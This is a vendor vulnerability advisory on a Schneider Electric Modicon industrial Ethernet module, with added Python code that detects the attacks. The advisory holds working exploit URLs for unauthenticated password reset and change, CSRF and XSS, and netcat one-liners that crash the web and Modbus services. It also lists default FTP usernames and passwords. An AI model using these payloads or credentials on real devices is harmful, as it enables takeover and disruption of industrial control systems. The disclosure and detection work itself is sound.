Tenable found multiple vulnerabilities in the Schneider Electric Quantum Modicon 140 NOC 771 01 Ethernet Module.
CVE-2018-7809: Unauthenticated Password Reset
An unauthenticated remote attacker can delete the existing username and password for the HTTP server by visiting the following URL:
http://[ip]/unsecure/embedded/builtin?submit=Delete%20Password
This also has the side effect of resetting the web server username and password to the default USER/USER.
CVE-2018-7810: Reflected XSS
A reflected XSS vulnerability exists in the HTTP server's endpoint /goform/formTest. A remote attacker can insert JavaScript into the name parameter that will be executed in the browser of the person who followed the link. An example follows:
http://[ip]/goform/formTest?name=<script>alert()</script>
CVE-2018-7811: Unauthenticated Password Change
The web server allows an authenticated remote user to change their password via the /secure/embedded/builtin endpoint. The web server also lets an unauthenticated remote attacker change users' passwords via the /unsecure/embedded/builtin endpoint. An example URL that changes the admin user's password to evilpass follows:
http://[ip]/unsecure/embedded/builtin?Language=English&user=admin&passwd=evilpass&cnfpasswd=evilpass&subhttppwd=Save+User
CVE-2018-7830: Unauthenticated Remote Denial of Service
A denial of service occurs when an unauthenticated remote attacker sends an HTTP request with no "\r\n\r\n" terminator. This renders the web server useless for roughly one minute. The following is a one-line proof of concept:
echo -e "GET /index.htm HTTP/1.1\r\nHost: 192.168.248.30" | nc 192.168.248.30 80
CVE-2018-7831: Cross-site request forgery
The password change functionality is implemented with an HTTP GET request in which the new password is specified. An anti-forgery token is not required to validate the request. Furthermore, the current password does not need to be specified in order to complete a password change. An attacker can forge a link to be sent to an authenticated victim. Once clicked, the password will be changed. Example URL:
http://[ip]/secure/embedded/builtin?Language=English&user=admin&passwd=evilpass&cnfpasswd=evilpass&subhttppwd=Save+User
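The five web-server issues above all show up in the request line, so a proxy or IDS in front of the module can flag them before they reach the device. The following is an added example (not Tenable's or Schneider's code): it classifies raw HTTP request text using only the endpoint paths and parameter names quoted in this advisory. The sample requests, the host name "plc", and the finding labels are constructed for illustration.

```python
"""Detection helpers for the Modicon 140 NOC 771 01 web-server issues.

Added example, not code from the advisory. Input is raw HTTP request text as a
reverse proxy or sensor would see it; output is a list of finding labels.
"""
from urllib.parse import parse_qs, unquote, urlsplit

# Fragments that indicate script injection in the reflected 'name' parameter.
XSS_MARKERS = {"<script", "javascript:", "onerror=", "onload="}


def classify_request(raw: str) -> list[str]:
    findings: list[str] = []

    # CVE-2018-7830: the server stalls on a request whose header block never ends.
    if "\r\n\r\n" not in raw:
        findings.append("CVE-2018-7830 unterminated HTTP request")

    request_line = raw.split("\r\n", 1)[0]
    parts = request_line.split(" ")
    if len(parts) < 2:
        return findings
    method, target = parts[0], parts[1]

    url = urlsplit(target)
    params = parse_qs(url.query, keep_blank_values=True)  # percent-decodes values

    if url.path == "/unsecure/embedded/builtin":
        # CVE-2018-7809: 'Delete Password' resets credentials without authentication.
        if params.get("submit") == ["Delete Password"]:
            findings.append("CVE-2018-7809 unauthenticated password reset")
        # CVE-2018-7811: password change on the unauthenticated endpoint.
        if "passwd" in params and "subhttppwd" in params:
            findings.append("CVE-2018-7811 unauthenticated password change")
    elif url.path == "/secure/embedded/builtin":
        # CVE-2018-7831: password change carried in a GET with no anti-forgery token.
        if method == "GET" and "passwd" in params:
            findings.append("CVE-2018-7831 password change via GET (CSRF-prone)")
    elif url.path == "/goform/formTest":
        # CVE-2018-7810: a second unquote also catches double-encoded payloads.
        name = unquote("".join(params.get("name", []))).lower()
        if any(marker in name for marker in XSS_MARKERS):
            findings.append("CVE-2018-7810 reflected XSS attempt in 'name'")
    return findings


# Constructed sample requests mirroring the URLs in the advisory (host "plc" is made up).
SAMPLE_REQUESTS = {
    "reset": "GET /unsecure/embedded/builtin?submit=Delete%20Password HTTP/1.1\r\nHost: plc\r\n\r\n",
    "change": ("GET /unsecure/embedded/builtin?Language=English&user=admin&passwd=evilpass"
               "&cnfpasswd=evilpass&subhttppwd=Save+User HTTP/1.1\r\nHost: plc\r\n\r\n"),
    "csrf": ("GET /secure/embedded/builtin?Language=English&user=admin&passwd=evilpass"
             "&cnfpasswd=evilpass&subhttppwd=Save+User HTTP/1.1\r\nHost: plc\r\n\r\n"),
    "xss": "GET /goform/formTest?name=%3Cscript%3Ealert()%3C/script%3E HTTP/1.1\r\nHost: plc\r\n\r\n",
    "dos": "GET /index.htm HTTP/1.1\r\nHost: 192.168.248.30",
    "benign": "GET /index.htm HTTP/1.1\r\nHost: plc\r\n\r\n",
}


def scan_samples() -> dict[str, list[str]]:
    """Classify every constructed sample; the 'benign' entry should come back empty."""
    return {label: classify_request(req) for label, req in SAMPLE_REQUESTS.items()}


if __name__ == "__main__":
    for label, findings in scan_samples().items():
        print(f"{label:7s} -> {findings or ['clean']}")
```

Matching on the exact paths keeps false positives low; the "passwd" rule on /secure/embedded/builtin is deliberately broad because, as the advisory notes, even the authenticated form is forgeable, so every GET that carries a new password is worth alerting on.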
Others
Tenable reported seven vulnerabilities to Schneider Electric. Schneider indicated that one of our findings (default accounts) was a duplicate and that the other (Modbus denial of service) was not a vulnerability. However, we've decided to document them here.
Default FTP Accounts
We found a handful of default FTP accounts. Some of the passwords we used relied on the VxHash collision disclosed by H.D. Moore in 2010.
Username  | Password
sysdiag   | factorycast@schneider
fdrusers  | sresurdf
fwupgrade | FaAmU5p2F~
loki      | ZfTljublsx
Modbus Denial of Service
Modbus is accessible over TCP port 502. Tenable found that the following unauthenticated remote Modbus message will completely shut down the Ethernet module:
echo -ne "\x0\xa8\x0\x0\x0\x5\x0\x5a\x0\x7\x0" | nc 192.168.238.30 502
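To see why this eleven-byte message is worth alerting on, it helps to split it into its MBAP header and PDU. The following decoder is an added example (not Tenable's or Schneider's code): it parses the Modbus/TCP framing, checks the length field against the bytes actually present, and flags any function code outside an allowlist of the standard public codes a monitoring point would expect from ordinary polling. The allowlist and the benign comparison frame are constructed assumptions; the frame under test is the advisory's own bytes.

```python
"""Modbus/TCP frame decoder and allowlist check.

Added example, not code from the advisory. MBAP header layout (big-endian):
transaction id (2), protocol id (2), length (2), unit id (1), then the PDU
whose first byte is the function code.
"""
import struct
from dataclasses import dataclass

# Assumption: standard public function codes seen in routine SCADA polling.
# Tune to the codes the site's HMI/historian actually issues.
ALLOWED_FUNCTION_CODES = {1, 2, 3, 4, 5, 6, 15, 16, 23}

# The advisory's frame: echo -ne "\x0\xa8\x0\x0\x0\x5\x0\x5a\x0\x7\x0"
ADVISORY_FRAME = bytes.fromhex("00a800000005005a000700")

# Constructed benign frame: Read Holding Registers (0x03), unit 1, address 0, count 10.
BENIGN_FRAME = bytes.fromhex("00010000000601030000000a")


@dataclass
class ModbusFrame:
    transaction_id: int
    protocol_id: int
    length: int
    unit_id: int
    function_code: int
    data: bytes


def decode_frame(frame: bytes) -> ModbusFrame:
    """Parse an MBAP header plus PDU, raising ValueError on malformed framing."""
    if len(frame) < 8:
        raise ValueError("frame shorter than MBAP header plus function code")
    tid, pid, length, uid = struct.unpack(">HHHB", frame[:7])
    if pid != 0:
        raise ValueError(f"protocol id {pid} is not Modbus")
    # The length field counts unit id + PDU, so the frame is exactly 6 + length bytes.
    if len(frame) != 6 + length:
        raise ValueError(f"length field {length} does not match {len(frame) - 6} bytes present")
    return ModbusFrame(tid, pid, length, uid, frame[7], frame[8:])


def assess(frame: bytes) -> list[str]:
    """Return finding labels for a frame; an empty list means nothing unusual."""
    try:
        decoded = decode_frame(frame)
    except ValueError as exc:
        return [f"malformed: {exc}"]
    findings = []
    if decoded.function_code not in ALLOWED_FUNCTION_CODES:
        findings.append(
            f"non-standard function code 0x{decoded.function_code:02x} ({decoded.function_code})"
        )
    return findings


if __name__ == "__main__":
    print(decode_frame(ADVISORY_FRAME))
    print("advisory frame:", assess(ADVISORY_FRAME))
    print("benign frame:  ", assess(BENIGN_FRAME))
```

Decoding the advisory's bytes gives transaction id 0x00a8, protocol id 0, length 5, unit id 0 and function code 0x5a (90) with three bytes of data. Function code 90 is not one of the standard public Modbus functions (it is the code Schneider uses for its proprietary UMAS traffic, a fact from the author's knowledge rather than from this advisory), so a simple allowlist on function code at the network boundary, restricted to engineering stations that legitimately need it, separates this traffic from routine register reads.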